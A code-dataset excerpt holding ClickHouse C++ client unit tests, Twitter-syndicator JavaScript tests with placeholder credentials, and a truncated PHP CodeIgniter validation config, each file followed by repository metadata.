        d1->Append("-12345.6789");
        d2->Append("-123456789012345678");
        d3->Append("-12345678901234567890123456789012345678");
        d4->Append("-12345.6789");
        d5->Append("-123456789012345678");
        d6->Append("-12345678901234567890123456789012345678");

        // Row 6: fractional digit counts that don't match the scale
        // (verified below: e.g. 12345.678 @ scale 4 reads back as 123456780).
        id->Append(6);
        d1->Append("12345.678");
        d2->Append("123456789.0123456789");
        d3->Append("1234567890123456789.0123456789012345678");
        d4->Append("12345.6789");
        d5->Append("123456789.012345678");
        d6->Append("1234567890123456789.0123456789012345678");

        b.AppendColumn("id", id);
        b.AppendColumn("d1", d1);
        b.AppendColumn("d2", d2);
        b.AppendColumn("d3", d3);
        b.AppendColumn("d4", d4);
        b.AppendColumn("d5", d5);
        b.AppendColumn("d6", d6);
        client_->Insert("test_clickhouse_cpp_decimal", b);
    }

    client_->Select("SELECT id, d1, d2, d3, d4, d5, d6 FROM test_clickhouse_cpp_decimal ORDER BY id", [](const Block& b) {
        if (b.GetRowCount() == 0) {
            return;
        }

        ASSERT_EQ(6u, b.GetRowCount());

        // Renders the raw 128-bit scaled integer as a decimal string so the
        // expectations below can be written as literals.
        auto int128_to_string = [](Int128 value) {
            std::string result;
            const bool sign = value >= 0;

            if (!sign) {
                value = -value;
            }

            while (value) {
                result += static_cast<char>(value % 10) + '0';
                value /= 10;
            }

            if (result.empty()) {
                result = "0";
            } else if (!sign) {
                result.push_back('-');
            }

            std::reverse(result.begin(), result.end());

            return result;
        };

        auto decimal = [&b](size_t column, size_t row) {
            return b[column]->As<ColumnDecimal>()->At(row);
        };

        EXPECT_EQ(1u, b[0]->As<ColumnUInt64>()->At(0));
        EXPECT_EQ("123456789", int128_to_string(decimal(1, 0)));
        EXPECT_EQ("123456789012345678", int128_to_string(decimal(2, 0)));
        EXPECT_EQ("1234567890123456789", int128_to_string(decimal(3, 0)));
        EXPECT_EQ("123456789", int128_to_string(decimal(4, 0)));
        EXPECT_EQ("123456789012345678", int128_to_string(decimal(5, 0)));
        EXPECT_EQ("1234567890123456789", int128_to_string(decimal(6, 0)));

        EXPECT_EQ(2u, b[0]->As<ColumnUInt64>()->At(1));
        EXPECT_EQ("999999999", int128_to_string(decimal(1, 1)));
        EXPECT_EQ("999999999999999999", int128_to_string(decimal(2, 1)));
        EXPECT_EQ("999999999999999999", int128_to_string(decimal(3, 1)));
        EXPECT_EQ("999999999", int128_to_string(decimal(4, 1)));
        EXPECT_EQ("999999999999999999", int128_to_string(decimal(5, 1)));
        EXPECT_EQ("999999999999999999", int128_to_string(decimal(6, 1)));

        EXPECT_EQ(3u, b[0]->As<ColumnUInt64>()->At(2));
        EXPECT_EQ("-999999999", int128_to_string(decimal(1, 2)));
        EXPECT_EQ("-999999999999999999", int128_to_string(decimal(2, 2)));
        EXPECT_EQ("-999999999999999999", int128_to_string(decimal(3, 2)));
        EXPECT_EQ("-999999999", int128_to_string(decimal(4, 2)));
        EXPECT_EQ("-999999999999999999", int128_to_string(decimal(5, 2)));
        EXPECT_EQ("-999999999999999999", int128_to_string(decimal(6, 2)));

        EXPECT_EQ(4u, b[0]->As<ColumnUInt64>()->At(3));
        EXPECT_EQ("123456789", int128_to_string(decimal(1, 3)));
        EXPECT_EQ("123456789012345678", int128_to_string(decimal(2, 3)));
        EXPECT_EQ("12345678901234567890123456789012345678", int128_to_string(decimal(3, 3)));
        EXPECT_EQ("123456789", int128_to_string(decimal(4, 3)));
        EXPECT_EQ("123456789012345678", int128_to_string(decimal(5, 3)));
        EXPECT_EQ("12345678901234567890123456789012345678", int128_to_string(decimal(6, 3)));

        EXPECT_EQ(5u, b[0]->As<ColumnUInt64>()->At(4));
        EXPECT_EQ("-123456789", int128_to_string(decimal(1, 4)));
        EXPECT_EQ("-123456789012345678", int128_to_string(decimal(2, 4)));
        EXPECT_EQ("-12345678901234567890123456789012345678", int128_to_string(decimal(3, 4)));
        EXPECT_EQ("-123456789", int128_to_string(decimal(4, 4)));
        EXPECT_EQ("-123456789012345678", int128_to_string(decimal(5, 4)));
        EXPECT_EQ("-12345678901234567890123456789012345678", int128_to_string(decimal(6, 4)));

        EXPECT_EQ(6u, b[0]->As<ColumnUInt64>()->At(5));
        // Short fraction is zero-padded to the column scale ("12345.678"
        // @ scale 4 -> 123456780); excess digits are dropped.
        EXPECT_EQ("123456780", int128_to_string(decimal(1, 5)));
        EXPECT_EQ("123456789012345678", int128_to_string(decimal(2, 5)));
        EXPECT_EQ("12345678901234567890123456789012345678", int128_to_string(decimal(3, 5)));
        EXPECT_EQ("123456789", int128_to_string(decimal(4, 5)));
        EXPECT_EQ("123456789012345678", int128_to_string(decimal(5, 5)));
        EXPECT_EQ("12345678901234567890123456789012345678", int128_to_string(decimal(6, 5)));
    });
}
// Test special chars in names: table and column identifiers containing
// spaces, doubled quotes, backticks, brackets and backslashes must survive
// DDL, INSERT and SELECT unchanged.
TEST_P(ClientCase, ColEscapeNameTest) {
    client_->Execute(R"sql(DROP TEMPORARY TABLE IF EXISTS "test_clickhouse_cpp_col_escape_""name_test";)sql");

    client_->Execute(R"sql(CREATE TEMPORARY TABLE IF NOT EXISTS "test_clickhouse_cpp_col_escape_""name_test" ("test space" UInt64, "test "" quote" UInt64, "test ""`'[]&_\ all" UInt64))sql");

    auto col1 = std::make_shared<ColumnUInt64>();
    col1->Append(1);
    col1->Append(2);
    auto col2 = std::make_shared<ColumnUInt64>();
    col2->Append(4);
    col2->Append(8);
    auto col3 = std::make_shared<ColumnUInt64>();
    col3->Append(16);
    col3->Append(32);

    // Unescaped column names as the client API should report them
    // (SQL doubles the quotes; here a quote is a single character).
    static const std::string column_names[] = {
        "test space",
        R"sql(test " quote)sql",
        R"sql(test "`'[]&_\ all)sql"
    };
    static const auto columns_count = sizeof(column_names)/sizeof(column_names[0]);

    Block block;
    block.AppendColumn(column_names[0], col1);
    block.AppendColumn(column_names[1], col2);
    block.AppendColumn(column_names[2], col3);

    client_->Insert(R"sql("test_clickhouse_cpp_col_escape_""name_test")sql", block);
    client_->Select(R"sql(SELECT * FROM "test_clickhouse_cpp_col_escape_""name_test")sql", [] (const Block& sblock)
    {
        int row = sblock.GetRowCount();
        if (row <= 0) {return;}
        ASSERT_EQ(columns_count, sblock.GetColumnCount());
        // Column names must come back exactly as they were registered.
        for (size_t i = 0; i < columns_count; ++i) {
            EXPECT_EQ(column_names[i], sblock.GetColumnName(i));
        }

        EXPECT_EQ(row, 2);
        EXPECT_EQ(sblock[0]->As<ColumnUInt64>()->At(0), 1u);
        EXPECT_EQ(sblock[0]->As<ColumnUInt64>()->At(1), 2u);
        EXPECT_EQ(sblock[1]->As<ColumnUInt64>()->At(0), 4u);
        EXPECT_EQ(sblock[1]->As<ColumnUInt64>()->At(1), 8u);
        EXPECT_EQ(sblock[2]->As<ColumnUInt64>()->At(0), 16u);
        EXPECT_EQ(sblock[2]->As<ColumnUInt64>()->At(1), 32u);
    });
}
// Test roundtrip of DateTime64 values: empty INSERT/SELECT first, then a
// spread of pre-epoch, epoch and far-future microsecond timestamps.
// Skipped on servers older than 20.1, which predate DateTime64.
TEST_P(ClientCase, DateTime64) {
    const auto & server_info = client_->GetServerInfo();
    if (versionNumber(server_info) < versionNumber(20, 1)) {
        std::cout << "Test is skipped since server '" << server_info << "' does not support DateTime64" << std::endl;
        return;
    }

    Block block;
    client_->Execute("DROP TEMPORARY TABLE IF EXISTS test_clickhouse_cpp_datetime64;");
    client_->Execute("CREATE TEMPORARY TABLE IF NOT EXISTS "
            "test_clickhouse_cpp_datetime64 (dt DateTime64(6)) ");

    auto col_dt64 = std::make_shared<ColumnDateTime64>(6);
    block.AppendColumn("dt", col_dt64);

    // Empty INSERT and SELECT
    client_->Insert("test_clickhouse_cpp_datetime64", block);
    client_->Select("SELECT dt FROM test_clickhouse_cpp_datetime64",
        [](const Block& block) {
            ASSERT_EQ(0U, block.GetRowCount());
        }
    );

    // Raw ticks at precision 6 (microseconds since epoch), negative = pre-epoch.
    const std::vector<Int64> data{
        -1'234'567'890'123'456'7ll, // approx year 1578
        -1'234'567'890'123ll,       // 1969-12-17T17:03:52.890123
        -1'234'567ll,               // 1969-12-31T23:59:58.234567
        0,                          // epoch
        1'234'567ll,                // 1970-01-01T00:00:01.234567
        1'234'567'890'123ll,        // 1970-01-15T06:56:07.890123
        1'234'567'890'123'456'7ll   // 2361-03-21T19:15:01.234567
    };
    for (const auto & d : data) {
        col_dt64->Append(d);
    }
    block.RefreshRowCount();

    // Non-empty INSERT and SELECT
    client_->Insert("test_clickhouse_cpp_datetime64", block);

    size_t total_rows = 0;
    client_->Select("SELECT dt FROM test_clickhouse_cpp_datetime64",
        [&total_rows, &data](const Block& block) {
            total_rows += block.GetRowCount();
            if (block.GetRowCount() == 0) {
                return;
            }

            // Rows may span multiple blocks; offset maps a block-local index
            // back into `data`.
            const auto offset = total_rows - block.GetRowCount();
            ASSERT_EQ(1U, block.GetColumnCount());
            if (auto col = block[0]->As<ColumnDateTime64>()) {
                for (size_t i = 0; i < col->Size(); ++i) {
                    EXPECT_EQ(data[offset + i], col->At(i)) << " at index: " << i;
                }
            }
        }
    );

    ASSERT_EQ(total_rows, data.size());
}
// Runs every ClientCase test twice: once with plain uncompressed transport
// (ping-before-query on), once with LZ4 compression (ping off). Connection
// parameters come from the environment with localhost defaults.
INSTANTIATE_TEST_SUITE_P(
    Client, ClientCase,
    ::testing::Values(
        ClientOptions()
            .SetHost(           getEnvOrDefault("CLICKHOUSE_HOST",     "localhost"))
            .SetPort(std::stoi( getEnvOrDefault("CLICKHOUSE_PORT",     "9000")))
            .SetUser(           getEnvOrDefault("CLICKHOUSE_USER",     "default"))
            .SetPassword(       getEnvOrDefault("CLICKHOUSE_PASSWORD", ""))
            .SetDefaultDatabase(getEnvOrDefault("CLICKHOUSE_DB",       "default"))
            .SetPingBeforeQuery(true),
        ClientOptions()
            .SetHost(           getEnvOrDefault("CLICKHOUSE_HOST",     "localhost"))
            .SetPort(std::stoi( getEnvOrDefault("CLICKHOUSE_PORT",     "9000")))
            .SetUser(           getEnvOrDefault("CLICKHOUSE_USER",     "default"))
            .SetPassword(       getEnvOrDefault("CLICKHOUSE_PASSWORD", ""))
            .SetDefaultDatabase(getEnvOrDefault("CLICKHOUSE_DB",       "default"))
            .SetPingBeforeQuery(false)
            .SetCompressionMethod(CompressionMethod::LZ4)
    ));
namespace {
    using namespace clickhouse;
    // Harmless read-only queries used by the ReadonlyClientTest suite.
    const auto QUERIES = std::vector<std::string>{"SELECT version()", "SELECT fqdn()", "SELECT buildId()",
            "SELECT uptime()", "SELECT filesystemFree()", "SELECT now()"};
}

// Read-only smoke suite: each of QUERIES must execute against a local server.
INSTANTIATE_TEST_SUITE_P(ClientLocalReadonly, ReadonlyClientTest,
    ::testing::Values(ReadonlyClientTest::ParamType{
        ClientOptions()
            .SetHost(           getEnvOrDefault("CLICKHOUSE_HOST",     "localhost"))
            .SetPort(std::stoi( getEnvOrDefault("CLICKHOUSE_PORT",     "9000")))
            .SetUser(           getEnvOrDefault("CLICKHOUSE_USER",     "default"))
            .SetPassword(       getEnvOrDefault("CLICKHOUSE_PASSWORD", ""))
            .SetDefaultDatabase(getEnvOrDefault("CLICKHOUSE_DB",       "default"))
            .SetSendRetries(1)
            .SetPingBeforeQuery(true)
            .SetCompressionMethod(CompressionMethod::None),
        QUERIES}));

// Negative-path suite: deliberately bad credentials; the expected server
// error message is part of the test parameters.
INSTANTIATE_TEST_SUITE_P(ClientLocalFailed, ConnectionFailedClientTest,
    ::testing::Values(ConnectionFailedClientTest::ParamType{
        ClientOptions()
            .SetHost(           getEnvOrDefault("CLICKHOUSE_HOST",     "localhost"))
            .SetPort(std::stoi( getEnvOrDefault("CLICKHOUSE_PORT",     "9000")))
            .SetUser("non_existing_user_clickhouse_cpp_test")
            .SetPassword("wrongpwd")
            .SetDefaultDatabase(getEnvOrDefault("CLICKHOUSE_DB", "default"))
            .SetSendRetries(1)
            .SetPingBeforeQuery(true)
            .SetCompressionMethod(CompressionMethod::None),
        "Authentication failed: password is incorrect"}));
|
C++
|
Apache-2.0
|
cnmade/clickhouse-cpp/ut/client_ut.cpp
|
251926c8-f8cb-443f-99e0-77254d63430d
|
[{"tag": "PASSWORD", "value": "wrongpwd", "start": 33364, "end": 33372, "context": "\")\n .SetPassword(\"wrongpwd\")\n .SetDefaultDat"}]
|
[{"tag": "PASSWORD", "value": "wrongpwd", "start": 33364, "end": 33372, "context": "\")\n .SetPassword(\"wrongpwd\")\n .SetDefaultDat"}]
|
/* eslint-disable camelcase */
import test from "ava";
import nock from "nock";
import { setGlobalDispatcher } from "undici";
import { websiteAgent } from "@indiekit-test/mock-agent";

import { twitter } from "../../lib/twitter.js";

// Route undici-based fetches for the publication website through the mock
// agent so media downloads never hit the network.
setGlobalDispatcher(websiteAgent());
test.beforeEach((t) => {
  // Shared fixtures: canned Twitter API response, media-object factory,
  // expected tweet URL/ID, client credentials and publication info.
  t.context = {
    apiResponse: {
      id_str: "1234567890987654321",
      user: { screen_name: "username" },
    },
    // BUGFIX: interpolate the `filename` parameter into the URL. The
    // previous template contained the literal text "$(unknown)", so the
    // parameter was never used and every fixture pointed at the same path.
    media: (filename) => ({
      url: `https://website.example/${filename}`,
      alt: "Example image",
    }),
    tweetUrl: "https://twitter.com/username/status/1234567890987654321",
    statusId: "1234567890987654321",
    options: {
      apiKey: "0123456789abcdefghijklmno",
      apiKeySecret: "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN0123456789",
      accessTokenKey: "ABCDEFGHIJKLMNabcdefghijklmnopqrstuvwxyz0123456789",
      accessTokenSecret: "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN",
      user: "username",
    },
    publication: {
      me: "https://website.example",
    },
  };
});
// Like endpoint: success, transport error, and API-level error responses.
test("Posts a like", async (t) => {
  nock("https://api.twitter.com")
    .post("/1.1/favorites/create.json")
    .reply(200, t.context.apiResponse);

  const result = await twitter(t.context.options).postLike(t.context.tweetUrl);

  t.is(result, "https://twitter.com/username/status/1234567890987654321");
});

test("Throws error posting a like", async (t) => {
  nock("https://api.twitter.com")
    .post("/1.1/favorites/create.json")
    .replyWithError("Not found");

  await t.throwsAsync(twitter(t.context.options).postLike(t.context.tweetUrl), {
    message: /Not found/,
  });
});

test("Throws API error posting a like", async (t) => {
  nock("https://api.twitter.com")
    .post("/1.1/favorites/create.json")
    .reply(404, {
      errors: [{ message: "Not found" }],
    });

  await t.throwsAsync(twitter(t.context.options).postLike(t.context.tweetUrl), {
    message: /Not found/,
  });
});
// Retweet endpoint: success, transport error, and API-level error responses.
test("Posts a retweet", async (t) => {
  nock("https://api.twitter.com")
    .post(`/1.1/statuses/retweet/${t.context.statusId}.json`)
    .reply(200, t.context.apiResponse);

  const result = await twitter(t.context.options).postRetweet(
    t.context.tweetUrl
  );

  t.is(result, "https://twitter.com/username/status/1234567890987654321");
});

test("Throws error posting a retweet", async (t) => {
  nock("https://api.twitter.com")
    .post(`/1.1/statuses/retweet/${t.context.statusId}.json`)
    .replyWithError("Not found");

  await t.throwsAsync(
    twitter(t.context.options).postRetweet(t.context.tweetUrl),
    {
      message: /Not found/,
    }
  );
});

test("Throws API error posting a retweet", async (t) => {
  nock("https://api.twitter.com")
    .post(`/1.1/statuses/retweet/${t.context.statusId}.json`)
    .reply(404, {
      errors: [{ message: "Not found" }],
    });

  await t.throwsAsync(
    twitter(t.context.options).postRetweet(t.context.tweetUrl),
    {
      message: /Not found/,
    }
  );
});
// Status-update endpoint: success, transport error, and API-level error.
test("Posts a status", async (t) => {
  nock("https://api.twitter.com")
    .post("/1.1/statuses/update.json")
    .reply(200, t.context.apiResponse);

  const result = await twitter(t.context.options).postStatus(t.context.status);

  t.is(result, "https://twitter.com/username/status/1234567890987654321");
});

test("Throws error posting a status", async (t) => {
  nock("https://api.twitter.com")
    .post("/1.1/statuses/update.json")
    .replyWithError("Not found");

  await t.throwsAsync(twitter(t.context.options).postStatus(t.context.status), {
    message: /Not found/,
  });
});

test("Throws API error posting a status", async (t) => {
  nock("https://api.twitter.com")
    .post("/1.1/statuses/update.json")
    .reply(404, {
      errors: [{ message: "Not found" }],
    });

  await t.throwsAsync(twitter(t.context.options).postStatus(t.context.status), {
    message: /Not found/,
  });
});
// Media upload: fetch failure, successful two-step upload (binary then
// metadata), upload API error, and rejection of non-media input.
test("Throws error fetching media to upload", async (t) => {
  // "image.jpg" is not served by the mock website agent, so the fetch fails.
  await t.throwsAsync(
    twitter(t.context.options).uploadMedia(
      t.context.media("image.jpg"),
      t.context.publication
    ),
    {
      message: "Not Found",
    }
  );
});

test("Uploads media and returns a media id", async (t) => {
  nock("https://upload.twitter.com").post("/1.1/media/upload.json").reply(200, {
    media_id_string: "1234567890987654321",
  });
  nock("https://upload.twitter.com")
    .post("/1.1/media/metadata/create.json")
    .reply(200, {});

  const result = await twitter(t.context.options).uploadMedia(
    t.context.media("photo1.jpg"),
    t.context.publication
  );

  t.is(result, "1234567890987654321");
});

test("Throws error uploading media", async (t) => {
  nock("https://upload.twitter.com")
    .post("/1.1/media/upload.json")
    .reply(404, {
      errors: [{ message: "Not found" }],
    });

  await t.throwsAsync(
    twitter(t.context.options).uploadMedia(
      t.context.media("photo2.jpg"),
      t.context.publication
    ),
    {
      message: /Not found/,
    }
  );
});

test("Returns false passing an object to media upload function", async (t) => {
  const result = await twitter(t.context.options).uploadMedia(
    { foo: "bar" },
    t.context.publication
  );

  t.falsy(result);
});
// High-level post() dispatch: like-of and repost-of properties only act on
// twitter.com URLs; anything else is ignored (falsy result).
test("Posts a like of a tweet to Twitter", async (t) => {
  nock("https://api.twitter.com")
    .post("/1.1/favorites/create.json")
    .reply(200, t.context.apiResponse);

  const result = await twitter(t.context.options).post(
    {
      "like-of": t.context.tweetUrl,
    },
    t.context.publication
  );

  t.is(result, "https://twitter.com/username/status/1234567890987654321");
});

test("Doesn’t post a like of a URL to Twitter", async (t) => {
  const result = await twitter(t.context.options).post(
    {
      "like-of": "https://foo.bar/lunchtime",
    },
    t.context.publication
  );

  t.falsy(result);
});

test("Posts a repost of a tweet to Twitter", async (t) => {
  nock("https://api.twitter.com")
    .post(`/1.1/statuses/retweet/${t.context.statusId}.json`)
    .reply(200, t.context.apiResponse);

  const result = await twitter(t.context.options).post(
    {
      "repost-of": t.context.tweetUrl,
    },
    t.context.publication
  );

  t.is(result, "https://twitter.com/username/status/1234567890987654321");
});

test("Doesn’t post a repost of a URL to Twitter", async (t) => {
  const result = await twitter(t.context.options).post(
    {
      "repost-of": "https://foo.bar/lunchtime",
    },
    t.context.publication
  );

  t.falsy(result);
});
// post() with content: quote-repost, plain status, and a status with photos
// (only the first four of five photos are uploaded — Twitter's limit).
test("Posts a quote status to Twitter", async (t) => {
  nock("https://api.twitter.com")
    .post("/1.1/statuses/update.json")
    .reply(200, t.context.apiResponse);

  const result = await twitter(t.context.options).post(
    {
      content: {
        html: "<p>Someone else who likes cheese sandwiches.</p>",
      },
      "repost-of": t.context.tweetUrl,
      "post-type": "repost",
    },
    t.context.publication
  );

  t.is(result, "https://twitter.com/username/status/1234567890987654321");
});

test("Posts a status to Twitter", async (t) => {
  nock("https://api.twitter.com")
    .post("/1.1/statuses/update.json")
    .reply(200, t.context.apiResponse);

  const result = await twitter(t.context.options).post(
    {
      content: {
        html: "<p>I ate a <em>cheese</em> sandwich, which was nice.</p>",
        text: "I ate a cheese sandwich, which was nice.",
      },
      url: "https://foo.bar/lunchtime",
    },
    t.context.publication
  );

  t.is(result, "https://twitter.com/username/status/1234567890987654321");
});

test("Posts a status to Twitter with 4 out of 5 photos", async (t) => {
  // Exactly four upload interceptors: the fifth photo must not be uploaded.
  nock("https://upload.twitter.com")
    .post("/1.1/media/upload.json")
    .reply(200, { media_id_string: "1" });
  nock("https://upload.twitter.com")
    .post("/1.1/media/upload.json")
    .reply(200, { media_id_string: "2" });
  nock("https://upload.twitter.com")
    .post("/1.1/media/upload.json")
    .reply(200, { media_id_string: "3" });
  nock("https://upload.twitter.com")
    .post("/1.1/media/upload.json")
    .reply(200, { media_id_string: "4" });
  nock("https://api.twitter.com")
    .post("/1.1/statuses/update.json")
    .reply(200, t.context.apiResponse);

  const result = await twitter(t.context.options).post(
    {
      content: {
        html: "<p>Here’s the cheese sandwiches I ate.</p>",
      },
      photo: [
        { url: `${t.context.publication.me}/photo3.jpg` },
        { url: `${t.context.publication.me}/photo4.jpg` },
        { url: `${t.context.publication.me}/photo5.jpg` },
        { url: `${t.context.publication.me}/photo6.jpg` },
        { url: `${t.context.publication.me}/photo7.jpg` },
      ],
    },
    t.context.publication
  );

  t.is(result, "https://twitter.com/username/status/1234567890987654321");
});
|
JavaScript
|
MIT
|
paulrobertlloyd/indiekit/packages/syndicator-twitter/tests/unit/twitter.js
|
0994c374-2855-4e35-8d53-e3ac6d0956df
|
[{"tag": "USERNAME", "value": "username", "start": 7484, "end": 7492, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Posts a "}, {"tag": "USERNAME", "value": "username", "start": 3236, "end": 3244, "context": "ext.status);\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Throws e"}, {"tag": "USERNAME", "value": "username", "start": 8720, "end": 8728, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n"}, {"tag": "USERNAME", "value": "username", "start": 6942, "end": 6950, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Posts a "}, {"tag": "USERNAME", "value": "username", "start": 5543, "end": 5551, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Doesn\u2019t "}, {"tag": "USERNAME", "value": "username", "start": 565, "end": 573, "context": "mage\",\n }),\n tweetUrl: \"https://twitter.com/username/status/1234567890987654321\",\n statusId: \"12345"}, {"tag": "API_KEY", "value": "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN", "start": 874, "end": 924, "context": "pqrstuvwxyz0123456789\",\n accessTokenSecret: \"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN\",\n user: \"username\",\n },\n publication:"}, {"tag": "API_KEY", "value": "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN0123456789", "start": 719, "end": 769, "context": "\"0123456789abcdefghijklmno\",\n apiKeySecret: \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN0123456789\",\n accessTokenKey: \"ABCDEFGHIJKLMNabcdefghij"}, {"tag": "API_KEY", "value": "ABCDEFGHIJKLMNabcdefghijklmnopqrstuvwxyz0123456789", "start": 795, "end": 845, "context": "ABCDEFGHIJKLMN0123456789\",\n accessTokenKey: \"ABCDEFGHIJKLMNabcdefghijklmnopqrstuvwxyz0123456789\",\n accessTokenSecret: \"0123456789abcdefghijk"}, {"tag": 
"USERNAME", "value": "username", "start": 1299, "end": 1307, "context": "t.tweetUrl);\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Throws e"}, {"tag": "API_KEY", "value": "0123456789abcdefghijklmno", "start": 670, "end": 695, "context": "34567890987654321\",\n options: {\n apiKey: \"0123456789abcdefghijklmno\",\n apiKeySecret: \"abcdefghijklmnopqrstuvwxyz"}, {"tag": "USERNAME", "value": "username", "start": 940, "end": 948, "context": "ghijklmnopqrstuvwxyzABCDEFGHIJKLMN\",\n user: \"username\",\n },\n publication: {\n me: \"https://we"}, {"tag": "USERNAME", "value": "username", "start": 6194, "end": 6202, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Doesn\u2019t "}]
|
[{"tag": "USERNAME", "value": "username", "start": 7484, "end": 7492, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Posts a "}, {"tag": "USERNAME", "value": "username", "start": 3236, "end": 3244, "context": "ext.status);\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Throws e"}, {"tag": "USERNAME", "value": "username", "start": 8720, "end": 8728, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n"}, {"tag": "USERNAME", "value": "username", "start": 6942, "end": 6950, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Posts a "}, {"tag": "USERNAME", "value": "username", "start": 5543, "end": 5551, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Doesn\u2019t "}, {"tag": "USERNAME", "value": "username", "start": 565, "end": 573, "context": "mage\",\n }),\n tweetUrl: \"https://twitter.com/username/status/1234567890987654321\",\n statusId: \"12345"}, {"tag": "KEY", "value": "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN", "start": 874, "end": 924, "context": "pqrstuvwxyz0123456789\",\n accessTokenSecret: \"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN\",\n user: \"username\",\n },\n publication:"}, {"tag": "KEY", "value": "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN0123456789", "start": 719, "end": 769, "context": "\"0123456789abcdefghijklmno\",\n apiKeySecret: \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN0123456789\",\n accessTokenKey: \"ABCDEFGHIJKLMNabcdefghij"}, {"tag": "KEY", "value": "ABCDEFGHIJKLMNabcdefghijklmnopqrstuvwxyz0123456789", "start": 795, "end": 845, "context": "ABCDEFGHIJKLMN0123456789\",\n accessTokenKey: \"ABCDEFGHIJKLMNabcdefghijklmnopqrstuvwxyz0123456789\",\n accessTokenSecret: \"0123456789abcdefghijk"}, {"tag": "USERNAME", 
"value": "username", "start": 1299, "end": 1307, "context": "t.tweetUrl);\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Throws e"}, {"tag": "KEY", "value": "0123456789abcdefghijklmno", "start": 670, "end": 695, "context": "34567890987654321\",\n options: {\n apiKey: \"0123456789abcdefghijklmno\",\n apiKeySecret: \"abcdefghijklmnopqrstuvwxyz"}, {"tag": "USERNAME", "value": "username", "start": 940, "end": 948, "context": "ghijklmnopqrstuvwxyzABCDEFGHIJKLMN\",\n user: \"username\",\n },\n publication: {\n me: \"https://we"}, {"tag": "USERNAME", "value": "username", "start": 6194, "end": 6202, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Doesn\u2019t "}]
|
<?php namespace Config;
class Validation
{
//--------------------------------------------------------------------
// Setup
//--------------------------------------------------------------------
/**
* Stores the classes that contain the
* rules that are available.
*
* @var array
*/
public $ruleSets = [
\CodeIgniter\Validation\Rules::class,
\CodeIgniter\Validation\FormatRules::class,
\CodeIgniter\Validation\FileRules::class,
\CodeIgniter\Validation\CreditCardRules::class,
];
/**
* Specifies the views that are used to display the
* errors.
*
* @var array
*/
public $templates = [
'list' => 'CodeIgniter\Validation\Views\list',
'single' => 'CodeIgniter\Validation\Views\single',
];
//--------------------------------------------------------------------
// Rules
//--------------------------------------------------------------------
// login
public $login = [
'email' => 'required',
'password' => 'required'
];
public $login_errors = [
'email' => [
'required' => 'Please provide a valid email address.'
],
'password' => [
'required' => 'Please provide a valid password.',
]
];
// update administrator
public $administrator = [
'name' => 'required|max_length[256]',
'email' => 'required|valid_email|max_length[256]',
'password' => 'required',
'password2' => 'permit_empty|min_length[8]',
];
public $administrator_errors = [
'name' => [
'required' => 'Please provide a valid name.',
'max_length' => 'Name must be less than 256 characters.'
],
'email' => [
'required' => 'Please provide a valid email address.',
'valid_email' => 'Please provide a valid email address.',
'max_length' => 'Email address must be less than 256 characters.'
],
'password' => [
'required' => 'Please provide the current password.',
],
'password2' => [
'min_length' => 'New password must be at least 8 characters long.'
]
];
// Clinic
public $clinic = [
'name' => 'required|max_length[256]',
'address' => 'required|max_length[256]',
'city' => 'required|max_length[256]',
'province' => 'required|max_length[256]'
];
public $clinic_errors = [
'name' => [
'required' => 'Please provide a valid name.',
'max_length' => 'Name must be less than 256 characters long.'
],
'address' => [
'required' => 'Please provide a valid address.',
'max_length' => 'Address must be less than 256 characters long.'
],
'city' => [
'required' => 'Please provide a valid city.',
'max_length' => 'City must be less than 256 characters long.'
],
'province' => [
'required' => 'Please provide a valid province.',
'max_length' => 'Province must be less than 256 characters long.'
]
];
// Update status pet owner
public $petOwner_status = [
'status' => 'required|in_list[0,1]'
];
public $petOwner_status_errors = [
'status' => [
'required' => 'Please provide a valid status.',
'in_list' => 'Please provide a valid status.'
]
];
// Register veterinarian
public $veterinarian_register = [
'name' => 'required|max_length[256]',
'email' => 'required|valid_email|max_length[256]',
'password' => 'required|min_length[8]',
'password2' => 'required|matches[password]',
'nik' => 'required|exact_length[16]',
'phone_number' => 'required|max_length[16]',
'pdhi_number' => 'required|max_length[50]',
];
public $veterinarian_register_errors = [
'name' => [
'required' => 'Please provide a valid name.',
'max_length' => 'Name must be less than 256 characters.'
],
'email' => [
'required' => 'Please provide a valid email address.',
'valid_email' => 'Please provide a valid email address.',
'max_length' => 'Email address must be less than 256 characters.'
],
'password' => [
'required' => 'Please provide a valid password.',
'min_length' => 'Password must be at least 8 characters long.'
],
'password2' => [
'required' => 'Please provide a valid confirmed password.',
'matches' => 'Password did not match.'
],
'nik' => [
'required' => 'Please provide a valid ID Number (NIK).',
'exact_length' => 'ID Number (NIK) must be 16 characters long.'
],
'phone_number' => [
'required' => 'Please provide a valid phone number.',
'max_length' => 'Phone number must be less than 16 characters.'
],
'pdhi_number' => [
